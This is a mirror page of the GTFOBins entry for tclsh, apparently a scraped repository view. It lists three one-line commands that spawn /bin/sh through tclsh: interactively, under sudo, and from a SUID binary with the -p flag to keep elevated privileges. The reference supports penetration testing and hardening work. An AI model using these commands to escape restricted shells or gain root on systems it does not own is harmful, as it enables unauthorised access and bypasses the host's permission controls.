1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-07 16:16:04 +02:00
GTFOBins.github.io/_gtfobins/tclsh.md
2018-05-21 20:14:41 +01:00

308 B

functions
exec-interactive sudo-enabled suid-enabled
code
tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
code
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
code
./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr